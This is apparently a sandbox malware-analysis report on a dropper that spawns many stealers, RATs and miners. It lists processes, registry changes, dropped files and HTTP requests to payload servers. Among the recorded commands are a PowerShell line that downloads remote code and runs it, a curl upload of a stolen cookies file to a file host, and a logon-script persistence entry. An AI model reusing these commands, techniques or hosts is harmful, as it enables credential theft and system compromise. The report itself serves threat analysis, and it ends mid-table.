mvc3.exe fo-wsftp605.exe no specs debugview%2b%2b.exe no specs ui.exe namuvpn7.exe no specs conhost.exe no specs namu832.exe no specs conhost.exe no specs 123123.exe conhost.exe no specs cscript.exe no specs #XRED server.exe conhost.exe no specs q8348.exe #AUTOHOTKEY giftorder.exe classticket.exe garo%20x.exe no specs mely.exe no specs namuvpn32.exe riende.exe no specs windowsupdate.exe netsh.exe no specs gertgherthre.exe regedit.exe no specs offlinepackv4.exe no specs conhost.exe no specs pkexu0ytxar3.exe no specs conhost.exe no specs fastping_silent_v4.exe isass.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe #SALATSTEALER randll32.exe sgn.exe no specs printer_driver_ssl_support_v43.22.209.99.exe cmd.exe no specs 4j8576a0e8v3.exe no specs 4j8576a0e8v3.exe no specs yx_dts.exe conhost.exe no specs cmd.exe no specs sm.exe namuvpnxp.exe 5252.exe xclient.exe cloudy.exe no specs msiexec.exe no specs 52.exe no specs cloudy.exe #STEALC 1488.exe no specs zjqppajn.exe hbvtmbp46iieehp1.exe no specs downloader.exe no specs shellhost.exe attrib.exe no specs conhost.exe no specs #STEALER mvc3.exe conhost.exe no specs powershell.exe round_setup.exe no specs konsol.exe no specs rdpw_installer.exe soul.exe no specs sc.exe no specs #XRED %e6%a2%a6%e5%b9%bb%e9%ad%94%e7%95%8c%e7%94%b5%e8%84%91%e7%ab%af.exe #VIDAR chrome_134.exe no specs notepad.exe no specs conhost.exe no specs taskkill.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs c1i.exe no specs cvf.exe no specs pld06b.tmp agent.exe no specs attrib.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs THREAT putty.exe no specs schtasks.exe no specs install.exe no specs bruterv3.1.exe no specs chilledwindows.gui.exe #DESTINYSTEALER imgs.exe conhost.exe no specs ntladlklthawd.exe no specs conhost.exe no specs csc.exe cmd.exe no specs #GOTOHTTP conhost.exe findstr.exe no specs bnoaprihjatuasss.exe cmd.exe no specs applaunch.exe no specs schtasks.exe no specs chromi~2.exe no specs ytkjmt.exe no specs chromeupdate.exe no specs msiexec.exe no specs nps.exe no specs bot.exe no specs sc.exe no specs conhost.exe no specs chcp.com no specs conhost.exe no specs msedge.exe firefox.exe chrome.exe snd16061.exe msiexec.exe no specs #GOTOHTTP conhost.exe powershell.exe findstr.exe no specs conhost.exe no specs cmd.exe no specs cvtres.exe no specs q-amd64-windows.exe nanocore_portable.exe msiexec.exe no specs zx.exe cmd.exe no specs conhost.exe no specs cvf.exe conhost.exe no specs setup.exe no specs cmd.exe no specs emmetprod.exe #NJRAT fast%20download.exe 444.exe conhost.exe no specs #GENERIC assignment.exe img001.exe no specs conhost.exe no specs findstr.exe no specs access.exe powershell.exe cmd.exe no specs zx.exe no specs critscript.exe pdf%20reader.exe forfiles.exe no specs disbalancer-go-client-windows-386.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs darts-pixelit.exe conhost.exe no specs cmd.exe no specs sc.exe no specs svchost.exe netsh.exe no specs conhost.exe no specs #REMCOS fxserver.exe msedge.exe chrome.exe firefox.exe 21.exe conhost.exe no specs findstr.exe no specs darts-wled.exe cmd.exe no specs driveapplet.exe no specs steanings.exe steanings.exe #VIDAR 1488.exe no specs conhost.exe no specs conhost.exe no specs gallery-dl.exe svhost.exe no specs pvp.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs taskkill.exe no specs #REMCOS prueba.exe msiexec.exe no specs taskhostw.exe no specs nslookup.exe wscript.exe no specs urbanvpn.exe no specs game.exe conhost.exe no specs findstr.exe no specs 21.tmp gallery-dl.exe no specs findstr.exe no specs powerrat.exe no specs 4.exe msiexec.exe no specs v1d.exe no specs csc.exe q-amd64-windows.exe no specs msiexec.exe no specs rdpwinst.exe no specs axam.exe %e8%87%aa%e5%8a%a8%e6%9b%b4%e6%96%b0%e8%be%85%e5%8a%a9%e7%a8%8b%e5%ba%8f.exe no specs powershell.exe nslookup.exe icaruslite-v1.1.13-win.exe msiexec.exe darwin.exe no specs powershell.exe no specs darts-wled.exe no specs darts-pixelit.exe no specs conhost.exe no specs conhost.exe no specs vector-fixer-v1.4.2.exe conhost.exe no specs conhost.exe no specs find.exe no specs cvtres.exe no specs #STEALER cmd.exe no specs reg.exe dowonline.installer.exe server.exe no specs cabal.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs haozip.100021.exe regsvr32.exe no specs cmd.exe no specs setup.exe no specs werfault.exe no specs forfiles.exe no specs sc.exe no specs sc.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs vector-fixer-v1.4.2.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs ping.exe no specs conhost.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs curl.exe conhost.exe no specs cmd.exe no specs dowonline.installer.tmp no specs csc.exe no specs cabalmain.exe no specs msiexec.exe no specs cabalmain.exe no specs msiexec.exe no specs powershell.exe no specs master.exe no specs msiexec.exe tiansys(xp%e4%b8%93%e7%94%a8).exe no specs #XRED %e6%83%85%e6%84%bf%e6%80%80%e6%97%a7.exe no specs win_driver_ssl_support_v43.22.209.44.exe no specs launcherloader.exe no specs taskkill.exe no specs darts-gif.exe no specs !wannadecryptor!.exe no specs msiexec.exe msiexec.exe msiexec.exe cr.exe no specs serials_checker.exe curl.exe axam.exe msiexec.exe msiexec.exe conhost.exe no specs teleport-assist-windows.exe no specs conhost.exe no specs conhost.exe no specs icaruslite-v1.1.13-win.exe conhost.exe no specs msiexec.exe no specs avamarconsolemultiple-windows-x86_64-7.2.1-32.exe no specs cmd.exe no specs reg.exe srtware.exe no specs vc2005sp1redist_x86.exe no specs uac_bypass.exe no specs self-injection.exe no specs conhost.exe no specs find.exe no specs bypass.exe conhost.exe no specs cvtres.exe no specs msiexec.exe no specs conhost.exe no specs hack.exe no specs complexo%20v4.exe no specs conhost.exe no specs axam.exe axam.exe kdmapper_release.exe no specs alphatweaks.exe no specs standalone_payload.exe no specs axam.exe cmd.exe no specs cmd.exe powershell.exe taskkill.exe no specs haoziploader.exe no specs x空间.exe no specs cqsj.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs dxwebsetup.exe conhost.exe no specs process-injection.exe no specs mshta.exe no specs conhost.exe no specs steamcmd.exe conhost.exe no specs mspaint.exe no specs axam.exe 7zg.exe no specs conhost.exe no specs dxwsetup.exe msiexec.exe cssgo.exe conhost.exe no specs taskmoder.exe mova.exe no specs update.exe cmd.exe no specs nwinfo.exe no specs nwinfo.exe no specs nwinfo.exe no specs mshta.exe no specs black.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powercfg.exe no specs writedat.exe no specs winsetaccess64.exe no specs conhost.exe no specs sc.exe no specs cmd.exe no specs rundll32.exe no specs autoupdate.exe no specs upm2008.exe no specs mport.exe no specs iatinfect2008_64.exe no specs cmd.exe no specs conhost.exe no specs axam.exe conhost.exe no specs conhost.exe no specs javaw.exe no specs mode.com no specs axam.exe powercfg.exe no specs svchost.exe no specs cmd.exe no specs riende.exe sc.exe no specs privacypolicy.exe no specs conhost.exe no specs axam.exe sc.exe no specs sc.exe no specs axam.exe xcopy.exe no specs conhost.exe no specs privacypolicy.tmp no specs donut.exe no specs connector1.exe lab01-02.exe no specs donut.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs jeditor.exe no specs calendar.exe agentnov.exe no specs sharphound.exe no specs #STEALER cmd.exe no specs conhost.exe no specs conhost.exe no specs system.exe no specs csc.exe no specs qimiaosetup.4.0.1.7.exe no specs axam.exe no specs ljgksdtihd.exe popapoers.exe sc.exe no specs powercfg.exe no specs conhost.exe no specs conhost.exe no specs taskkill.exe no specs autocad_v1.4.exe pfntjejghjsdkr.exe no specs vikings.exe no specs curl.exe no specs rustdesk-1.2.3-2-x86_64.exe no specs cvtres.exe no specs qimiaosetup.4.0.1.7.tmp no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs bnkrigkawd.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs taskkill.exe no specs conhost.exe no specs conhost.exe no specs ndisinstaller3.2.32.1.exe no specs zubovlekciya.exe no specs powercfg.exe no specs powershell.exe no specs conhost.exe no specs xcopy.exe no specs sc.exe no specs conhost.exe no specs flmgrtray.exe sc.exe no specs axam.exe sc.exe no specs axam.exe axam.exe cmd.exe no specs axam.exe axam.exe icacls.exe no specs conhost.exe no specs icacls.exe no specs system.exe #STEALER cmd.exe no specs conhost.exe no specs msiexec.exe no specs conhost.exe no specs axam.exe powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs mode.com no specs conhost.exe no specs axam.exe axam.exe msiexec.exe no specs conhost.exe no specs cmd.exe no specs main.exe no specs powershell.exe no specs axam.exe wmic.exe no specs main1.exe no specs main1.exe no specs main1.exe no specs sc.exe no specs dts.exe no specs dialer.exe no specs dts.exe no specs powershell.exe cmd.exe taskkill.exe no specs flserver.exe wmic.exe no specs conhost.exe no specs vssvc.exe no specs fscan32.exe no specs axam.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs xcopy.exe no specs conhost.exe no specs axam.exe curl.exe netsh.exe no specs opyhjdase.exe no specs conhost.exe no specs conhost.exe no specs axam.exe steamerx.exe no specs conhost.exe no specs conhost.exe no specs openwith.exe no specs chromelevator.exe no specs msbuild.exe no specs main1.exe no specs sound.exe no specs cd4.exe no specs redx_setup.exe no specs conhost.exe no specs cagservice.exe no specs #STEALER cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs sc.exe no specs conhost.exe no specs choice.exe no specs cmd.exe no specs main1.exe no specs powershell.exe no specs sc.exe no specs #MINER xblkpfz8y4.exe stub.exe no specs justpoc.exe msiexec.exe no specs mshta.exe no specs main1.exe no specs conhost.exe no specs conhost.exe no specs msiexec.exe no specs conhost.exe no specs wscript.exe no specs reg.exe no specs 7z.exe no specs wscript.exe no specs axam.exe axam.exe axam.exe powershell.exe no specs axam.exe curl.exe no specs sc.exe no specs applaunch.exe no specs gui.exe no specs mode.com no specs xcopy.exe no specs reg.exe no specs dialer.exe no specs powershell.exe no specs msiexec.exe no specs curl.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs THREAT rdpwinst.exe no specs taskkill.exe no specs certinst.exe no specs axam.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs rundll32.exe no specs cmd.exe no specs cmd.exe no specs gxtuum.exe no specs srfuhxm.exe no specs timeout.exe no specs 7z.exe no specs axam.exe no specs cmd.exe no specs snetcfg.exe no specs msiexec.exe no specs timeout.exe no specs werfault.exe no specs stub.exe no specs #STEALER cmd.exe no specs cmd.exe no specs x空间.exe no specs reg.exe no specs conhost.exe no specs werfault.exe no specs 20lb5101.jnh.scr no specs nslookup.exe no specs axam.exe no specs findstr.exe no specs axam.exe no specs findstr.exe no specs msiexec.exe no specs rundll32.exe no specs wmic.exe no specs reg.exe no specs conhost.exe no specs rundll32.exe no specs conhost.exe no specs rustdesk.exe no specs chcp.com no specs vc_redist.x64.exe no specs conhost.exe no specs conhost.exe no specs axam.exe no specs wmic.exe no specs chcp.com no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs netsh.exe no specs reg.exe no specs conhost.exe no specs aspnet_compiler.exe no specs inieditor.exe no specs cmd.exe no specs conhost.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs cd4.exe no specs findstr.exe no specs conhost.exe no specs conhost.exe no specs axam.exe no specs cmd.exe msiexec.exe no specs conhost.exe no specs netsh.exe no specs curl.exe findstr.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs reg.exe no specs taskkill.exe no specs nanocore.exe no specs curl.exe no specs sc.exe no specs rundll32.exe no specs drvinst.exe no specs gxtuum.exe no specs steamcmd.exe no specs reg.exe no specs schtasks.exe no specs #LUMMA svchost.exe explorer.exe main.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
508bot_x64.exeC:\Users\admin\Desktop\a\bot_x64.exe
main.exe
User:
admin
Company:
Intel Corporation
Integrity Level:
HIGH
Description:
Volume Shadow Copy Service
Version:
2.9.7035.67
Modules
Images
c:\users\admin\desktop\a\bot_x64.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
672vnc.exeC:\Users\admin\Desktop\a\vnc.exemain.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\a\vnc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
900Silentum_Spoofer.exeC:\Users\admin\Desktop\a\Silentum_Spoofer.exe
main.exe
User:
admin
Integrity Level:
HIGH
Description:
Version:
0.0.0.0
Modules
Images
c:\users\admin\desktop\a\silentum_spoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1652cd4.exeC:\Users\admin\Desktop\a\cd4.exemain.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1860\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exenwinfo.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1972"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Invoke-RestMethod 79.8141710/cl-ncl-start | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2136C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"C:\Windows\System32\cmd.exe
mvc3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2164"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpuC:\Program Files\Google\Chrome\Application\chrome.exe
L7XH7UR9695U.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2164"C:\WINDOWS\System32\sc.exe" stop UsoSvcC:\Windows\System32\sc.exenslookup.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Service Control Manager Configuration Tool
Exit code:
1062
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
656 459
Read events
654 433
Write events
1 890
Delete events
136

Modification events

(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000000000000000000
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconLayouts
Value:
00000000000000000000000000000000030001000100010014000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000001700000000000000610075006300740069006F006E00730070006500630069006600690063002E007200740066003E002000200000000F0000000000000065007600650072007000640066002E007200740066003E00200020000000170000000000000065006E0074007200790063006F006C006C0065006300740069006F006E002E007200740066003E002000200000001C00000000000000660075006E006300740069006F006E00730063006F006D006D0075006E00690074006900650073002E0070006E0067003E0020002000000011000000000000006B006E006F0077006E0064006F006E0065002E0070006E0067003E0020002000000015000000000000006D006F00640065006C00700072006F006A0065006300740073002E006A00700067003E0020002000000017000000000000006F007000740069006F006E0061006C0073006300690065006E00630065002E006A00700067003E0020002000000014000000000000006F0076006500720076006900650077006400610072006B002E007200740066003E002000200000001800000000000000670072006500610074006500720065006D0070006C006F0079006500650073002E0070006E0067003E0020002000000012000000000000006C006100720067006500730074006800690074002E0070006E0067003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000160000000000000072006500730075006C00740064006F00630075006D0065006E0074002E007200740066003E002000200000001800000000000000770068006F006C00650069006E0064006900760069006400750061006C0073002E006A00700067003E0020002000000002000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000140000000000000000000000000000000000000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000004008000000803F0000803F07000000803F0000404009000000803F000080400A0000000040000040400F000000803F0000A0400B000000004000008040100000000040000000000C00000000400000803F0D0000000040000000400E000000404000000040120000004040000040401300000000400000A040110002000100000000000000000001000000000000000200010000000000000000001200000007000000010000001400000000000000000000000000000000000000803F0000000007000000803F000000400900000000000000404008000000803F000040400A000000803F000080400F000000803F0000A0400B000000803F0000C040100000000040000000000C00000000400000803F0D0000000040000000400E000000004000004040120000000040000080401300000000000000803F01000000000000000040020000000000000080400300000000000000A0400400000000000000C04005000000803F0000803F0600000000400000A0401100
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconNameVersion
Value:
1
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:writeName:LastUpdate
Value:
96E9EC6900000000
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000027031A
Operation:writeName:VirtualDesktop
Value:
100000003030445602603FA5B72DE44882A417B3949BF781
(PID) Process:(7876) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:delete valueName:Preferences
Value:
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000D020E
Operation:writeName:VirtualDesktop
Value:
100000003030445602603FA5B72DE44882A417B3949BF781
(PID) Process:(508) bot_x64.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:UserInitMprLogonScript
Value:
"C:\WINDOWS\system32\cmd.exe" /c start /b "" "C:\Users\admin\Desktop\a\bot_x64.exe"
(PID) Process:(508) bot_x64.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:UserInitMprLogonScript
Value:
"C:\WINDOWS\system32\cmd.exe" /c start /b "" "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Services\winhost.exe"
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconLayouts
Value:
00000000000000000000000000000000030001000100010015000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C0000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C0000001700000000000000610075006300740069006F006E00730070006500630069006600690063002E007200740066003E002000200000000F0000000000000065007600650072007000640066002E007200740066003E00200020000000170000000000000065006E0074007200790063006F006C006C0065006300740069006F006E002E007200740066003E002000200000001C00000000000000660075006E006300740069006F006E00730063006F006D006D0075006E00690074006900650073002E0070006E0067003E0020002000000011000000000000006B006E006F0077006E0064006F006E0065002E0070006E0067003E0020002000000015000000000000006D006F00640065006C00700072006F006A0065006300740073002E006A00700067003E0020002000000017000000000000006F007000740069006F006E0061006C0073006300690065006E00630065002E006A00700067003E0020002000000014000000000000006F0076006500720076006900650077006400610072006B002E007200740066003E002000200000001800000000000000670072006500610074006500720065006D0070006C006F0079006500650073002E0070006E0067003E0020002000000012000000000000006C006100720067006500730074006800690074002E0070006E0067003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000160000000000000072006500730075006C00740064006F00630075006D0065006E0074002E007200740066003E002000200000001800000000000000770068006F006C00650069006E0064006900760069006400750061006C0073002E006A00700067003E00200020000000050000000000000061003E005C002000000002000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000150000000000000000000000000000000000000000000000803F0100000000000000004002000000000000004040030000000000000080400400000000000000A04005000000803F0000000006000000803F0000004008000000803F0000803F07000000803F0000404009000000803F000080400A0000000040000040400F000000803F0000A0400B000000004000008040100000000040000000000C00000000400000803F0D0000000040000000400E000000404000000040120000004040000040401300000000400000A04011000000404000008040140002000100000000000000000001000000000000000200010000000000000000001200000007000000010000001500000000000000000000400000C0401400000000000000000000000000803F0000000007000000803F000000400900000000000000404008000000803F000040400A000000803F000080400F000000803F0000A0400B000000803F0000C040100000000040000000000C00000000400000803F0D0000000040000000400E000000004000004040120000000040000080401300000000000000803F01000000000000000040020000000000000080400300000000000000A0400400000000000000C04005000000803F0000803F0600000000400000A0401100
Executable files
1 291
Suspicious files
266
Text files
1 828
Unknown types
100

Dropped files

PID
Process
Filename
Type
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_bz2.pydexecutable
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB
SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
4696explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dattext
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_asyncio.pydexecutable
MD5:56F958EEBBC62305B4BF690D61C78E28
SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_hashlib.pydexecutable
MD5:3E540EF568215561590DF215801B0F59
SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_overlapped.pydexecutable
MD5:363409FBACB1867F2CE45E3C6922DDB4
SHA256:F154AC9D5CA0646D18F6197C0406F7541B6E0752B2D82A330036C1E39D3A49E7
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_queue.pydexecutable
MD5:CC0F4A77CCFE39EFC8019FA8B74C06D0
SHA256:DEE7D19A9FCAB0DF043DC56F2CDC32F1A2A968AB229679B38B378C61CA0CBA53
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\api-ms-win-core-errorhandling-l1-1-0.dllexecutable
MD5:5DB4B10081A52D02D078401FA62DCE20
SHA256:FE9EC4E8C35C485E093CCBC1FAC402C9077A620F3139DD041E2E5E68115EC189
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\_cffi_backend.cp313-win_amd64.pydexecutable
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
6884main.exeC:\Users\admin\AppData\Local\Temp\_MEI68842\api-ms-win-core-file-l1-1-0.dllexecutable
MD5:B914966BC29D1C55A656071AD9E592AA
SHA256:35A8879678F63635E2D4D41DEC511B0E71AB8E5B8BF7F8B92AC615E4452D2AF8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1 734
TCP/UDP connections
1 743
DNS requests
374
Threats
724

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5532
SearchApp.exe
GET
200
23.11.41.157:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
NL
binary
312 b
whitelisted
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
960 b
whitelisted
8072
main.exe
GET
200
82.26.74.80:5001
http://82.26.74.80:5001/bot.exe
DE
executable
5.96 Mb
malicious
8072
main.exe
GET
168.222.254.210:8079
http://168.222.254.210:8079/5252.exe
GB
unknown
8072
main.exe
GET
200
62.60.226.203:80
http://62.60.226.203/gertgherthre.exe
GB
executable
4.63 Mb
malicious
8072
main.exe
GET
200
168.222.254.210:8079
http://168.222.254.210:8079/52.exe
GB
executable
2.91 Mb
malicious
8072
main.exe
GET
91.92.242.236:80
http://91.92.242.236/oPvjr94jfe/Plugins/vnc.exe
SC
unknown
8072
main.exe
GET
200
38.76.199.154:8888
http://38.76.199.154:8888/pro_payload.exe
US
executable
3.00 Kb
unknown
8072
main.exe
GET
200
38.76.199.154:8888
http://38.76.199.154:8888/pro_stager.exe
US
text
4.00 Kb
unknown
8072
main.exe
GET
118.107.44.190:8080
